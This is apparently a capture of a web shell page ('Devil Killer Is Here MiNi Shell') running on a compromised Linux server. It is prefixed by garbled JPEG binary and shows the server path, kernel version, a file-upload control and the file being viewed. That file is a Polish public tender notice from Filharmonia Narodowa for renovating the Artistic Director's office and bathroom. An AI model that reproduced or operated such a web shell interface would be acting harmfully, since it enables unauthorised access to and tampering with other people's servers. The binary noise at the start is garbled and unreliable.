JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250509/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250509/0022494401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja pomieszczeń Dyrektora Artystycznego w gmachu Filharmonii Narodowej w Warszawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">FILHARMONIA NARODOWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000278534</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jasna 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 55 17 111</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@filharmonia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">filharmonia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja pomieszczeń Dyrektora Artystycznego w gmachu Filharmonii Narodowej w Warszawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-39e060f3-13e7-4c50-bbbc-8a8c2efb5958</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00224944</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00125688/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont i wymiana wyposażenia gabinetu Dyrektora Artystycznego Filharmonii Narodowej w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://filharmonia.ezamawiajacy.pl/pn/filharmonia/demand/209943/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://filharmonia.ezamawiajacy.pl/pn/filharmonia/demand/209943/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się wyłącznie z wykorzystaniem Platformy (strony internetowej prowadzonego postępowania: https://filharmonia.ezamawiajacy.pl/pn/filharmonia/demand/209943/notice/public/details), z zastrzeżeniem komunikacji w sprawie zawarcia umowy o udzielenie zamówienia publicznego pomiędzy Zamawiającym a Wykonawcą, którego oferta została wybrana jako najkorzystniejsza oraz indywidualnego ustalenia terminu wizji lokalnej, która dopuszczalna jest także z wykorzystaniem poczty elektronicznej. Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej określono w Rozdziale 11 SWZ &#34;Informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami wraz z określeniem trybu przekazywania oświadczeń i dokumentów&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny oraz określenie zasad przetwarzania danych osobowych zawarty jest w Rozdziale 25 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenia w zakresie stosowania RODO zostały zawarte w Rozdziale 25 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/01/05/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie robót budowlanych polegających na modernizacji pomieszczeń Dyrektora<br/>Artystycznego w gmachu Filharmonii Narodowej w Warszawie przy ul. Jasnej 5 (dalej zwany „Przedmiotem zamówienia”) z<br/>podziałem na części.<br/>Część 1: modernizacja Gabinetu Dyrektora Artystycznego.<br/>Przedmiot zamówienia w zakresie Części 1 obejmuje w szczególności wykonanie robót budowlanych i innych świadczeń w<br/>następującym zakresie:<br/>- demontaż drobnych elementów wyposażenia i lamp;<br/>- zlikwidowanie ewentualnych pęknięć tynków ścian;<br/>- dwukrotne szpachlowanie ścian i sufitu;<br/>- dwukrotne malowanie ścian i sufitu;<br/>- montaż paneli ściennych;<br/>- wymianę i dodanie lamp sufitowych i ściennych;<br/>- dodanie gniazdek elektrycznych;<br/>- odmalowanie grzejnika żeliwnego;<br/>- szlifowanie parapetu z lastryko;<br/>- wymianę parkietu drewnianego;<br/>- dostawa i montaż zabudów meblowych, mebli ruchomych oraz elementów wyposażenia i urządzeń składających się na<br/>Przedmiot zamówienia;<br/>- prace towarzyszące, zabezpieczające oraz porządkowe.<br/>Wykonawca zobowiązany jest uwzględnić, w celu należytego wykonania Przedmiotu zamówienia, czas niezbędny na<br/>zapewnienie dostaw (w tym wykonanie/produkcję) wyposażenia i urządzeń składających się na Przedmiot zamówienia, w<br/>terminie umożliwiającym wykonanie Przedmiotu zamówienia zgodnie z Umową. Szczegółowy opis Przedmiotu zamówienia<br/>określa Załącznik nr 10 do SWZ. Przedmiot zamówienia obejmuje wszelkie świadczenia objęte treścią SWZ i czynności oraz roboty wymagane obowiązującymi przepisami prawa i zasadami wiedzy technicznej. Przedmiot zamówienia obejmuje czynności i roboty bezpośrednio wynikające z dokumentów wskazanych w Rozdziale 3. ust. 4 SWZ, jak również obejmuje wszystko to, co z technicznego punktu widzenia jest lub okaże się niezbędne do jego zrealizowania </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45432114-6 - Roboty w zakresie podłóg drewnianych</p> <p class="mb-0">45432200-6 - Wykładanie i tapetowanie ścian</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">39150000-8 - Różne meble i wyposażenie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-01 do 2025-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert w zakresie Części 1 Przedmiotu zamówienia zgodnie z Rozdziałem 18 SWZ, według poniższych kryteriów oceny ofert:<br/>- kryterium Cena (C);<br/>- kryterium Okres gwarancji jakości i rękojmi (O)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie robót budowlanych polegających na modernizacji pomieszczeń Dyrektora Artystycznego w gmachu Filharmonii Narodowej w Warszawie przy ul. Jasnej 5 (dalej zwany „Przedmiotem zamówienia”) z podziałem na części.<br/>Część 2: modernizacja łazienki przy Gabinecie Dyrektora Artystycznego.<br/>Przedmiot zamówienia w zakresie Części 2 obejmuje w szczególności wykonanie robót budowlanych i innych świadczeń w następującym zakresie:<br/>- prace rozbiórkowe i demontażowe;<br/>- zmiany w instalacji elektrycznej z dodaniem dwóch nowych obwodów i dostosowaniem do nowej lokalizacji odbiorników;<br/>- zmiany w instalacji wod-kan z dostosowaniem do nowej lokalizacji urządzeń sanitarnych;<br/>- wykonanie nowej szlichty cementowej ze spadkiem do odpływu natrysku;<br/>- postawienie nowej ścianki działowej, montaż sufitów podwieszonych, wyrównanie ścian;<br/>- montaż mat grzewczych ogrzewania podłogowego;<br/>- ułożenie płytek podłogowych z wykonaniem izolacji;<br/>- ułożenie płytek ściennych wraz z wykończeniem listwami ozdobnymi;<br/>- montaż ozdobnych sztukaterii gipsowych;<br/>- wykonanie gładzi na ścianach nie wyłożonych płytkami, dwukrotne pomalowanie ścian oraz sufitów;<br/>- montaż nowych urządzeń sanitarnych;<br/>- montaż nowego oświetlenia i osprzętu;<br/>- montaż wyposażenia i mebli;<br/>- odmalowanie ściany klatki schodowej między parterem a 1 piętrem po prowadzeniu podtynkowo instalacji elektrycznej;<br/>- prace towarzyszące, zabezpieczające oraz porządkowe.<br/>Wykonawca zobowiązany jest uwzględnić, w celu należytego wykonania Przedmiotu zamówienia, czas niezbędny na zapewnienie dostaw (w tym wykonanie/produkcję) wyposażenia i urządzeń składających się na Przedmiotu zamówienia, w terminie umożliwiającym wykonanie Przedmiotu zamówienia zgodnie z Umową. Szczegółowy opis Przedmiotu zamówienia określa Załącznik nr 10 do SWZ. Przedmiot zamówienia obejmuje wszelkie świadczenia objęte treścią SWZ i czynności oraz roboty wymagane obowiązującymi przepisami prawa i zasadami wiedzy technicznej. Przedmiot zamówienia obejmuje czynności i roboty bezpośrednio wynikające z dokumentów wskazanych w Rozdziale 3. ust. 4 SWZ, jak również obejmuje wszystko to, co z technicznego punktu widzenia jest lub okaże się niezbędne do jego zrealizowania </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <p class="mb-0">45432112-2 - Kładzenie nawierzchni</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-01 do 2025-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert w zakresie Części 2 Przedmiotu zamówienia zgodnie z Rozdziałem 18 SWZ, według poniższych kryteriów oceny ofert:<br/>- kryterium Cena (C);<br/>- kryterium Okres gwarancji jakości i rękojmi (O)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>1.1. spełniają określone przez Zamawiającego warunki udziału w postępowaniu;<br/>1.2. nie podlegają wykluczeniu na zasadach określonych w Rozdziale 7.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki dotyczące:<br/>2.1. zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeśli wykaże, że:<br/>2.1.1. dla Części 1 Przedmiotu zamówienia – w okresie ostatnich 5 latach, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie co najmniej 2 zamówienia (2 umowy) o wartości zamówienia nie mniejszej niż 130 000 zł (słownie: sto trzydzieści tysięcy złotych) brutto każda, odpowiadające swoim rodzajem Przedmiotowi zamówienia, polegające na remoncie lub modernizacji budynku użyteczności publicznej lub jego części w rozumieniu art. 3 pkt 2 ustawy z dnia 07.07.1994 r. Prawo budowlane (tj. Dz. U. z 2024 r. poz. 725 ze zm., dalej zwanej „Prawem budowlanym”) w systemie „pod klucz” wraz z wyposażeniem pomieszczeń;<br/>2.1.2. dla Części 2 Przedmiotu zamówienia – w okresie ostatnich 5 latach, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie co najmniej 2 zamówienia (2 umowy) o wartości zamówienia nie mniejszej niż 75 000 zł (słownie: siedemdziesiąt pięć tysięcy złotych) brutto każda, odpowiadające swoim rodzajem Przedmiotowi zamówienia, polegające na remoncie lub modernizacji budynku użyteczności publicznej lub jego części w rozumieniu art. 3 pkt 2 ustawy z dnia 07.07.1994 r. Prawa budowlanego, w systemie „pod klucz” wraz z wyposażeniem pomieszczeń <br/>- przy czym w przypadku, gdy Wykonawca składa ofertę na obydwie Części Przedmiotu zamówienia dopuszcza się wskazanie tych samych robót budowlanych dla wykazania spełnienia warunku dla Części 1 oraz Części 2 Przedmiotu zamówienia, jeżeli spełniają one warunki określone dla obydwu tych Części;<br/>2.1.3. dysponuje:<br/>2.1.3.1. dla Części 1 Przedmiotu zamówienia i Części 2 Przedmiotu zamówienia – co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi zgodnie z Prawem budowlanym oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) oraz art. 37c ustawy z dnia z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (tj. Dz.U. z 2024 r. poz. 1292), która posiada kwalifikacje zawodowe potwierdzone posiadaniem uprawnień budowlanych do kierowania robotami budowlanymi w branży konstrukcyjno-budowlanej bez ograniczeń albo inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których, w aktualnym stanie prawnym, uprawniają uprawnienia budowlane w tej specjalności oraz co najmniej 3-letnie doświadczenie, która co najmniej przez 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury. W przypadku gdy Wykonawca składa ofertę na obydwie Części Przedmiotu zamówienia dopuszcza się wskazanie tej samej osoby dla wykazania spełnienia warunku dla Części 1 oraz Części 2 Przedmiotu zamówienia;<br/>2.2. sytuacji ekonomicznej lub finansowej:<br/>2.2.1. dla Części 1 Przedmiotu zamówienia oraz Części 2 Przedmiotu zamówienia – Wykonawca spełni ten warunek, jeśli wykaże, że jest ubezpieczony na sumę nie mniejszą niż 150.000,00 złotych (słownie: sto pięćdziesiąt tysięcy złotych) od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z Przedmiotem zamówienia. W przypadku gdy Wykonawca składa ofertę na obydwie Części Przedmiotu zamówienia dopuszcza się wykazanie tego samego ubezpieczenia dla wykazania spełnienia warunku dla Części 1 oraz Części 2 Przedmiotu zamówienia.<br/>3. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły „spełnia/nie spełnia”.<br/>4. Oceniając zdolność techniczną lub zawodową, Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia<br/>gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5. Wymagania w zakresie spełnienia warunków udziału w postępowaniu w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostały uregulowane w Rozdziale 13. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zarówno w zakresie Części 1 Przedmiotu zamówienia, jak i Części 2 Przedmiotu zamówienia Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień ich złożenia, podmiotowych środków dowodowych, tj.:<br/>- oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w ust. 1 Rozdziału 9. SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – zgodnie ze wzorem oświadczenia stanowiącym<br/>Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zarówno w zakresie Części 1 Przedmiotu zamówienia, jak i Części 2 Przedmiotu zamówienia Zamawiający wzywa Wykonawcę, którego 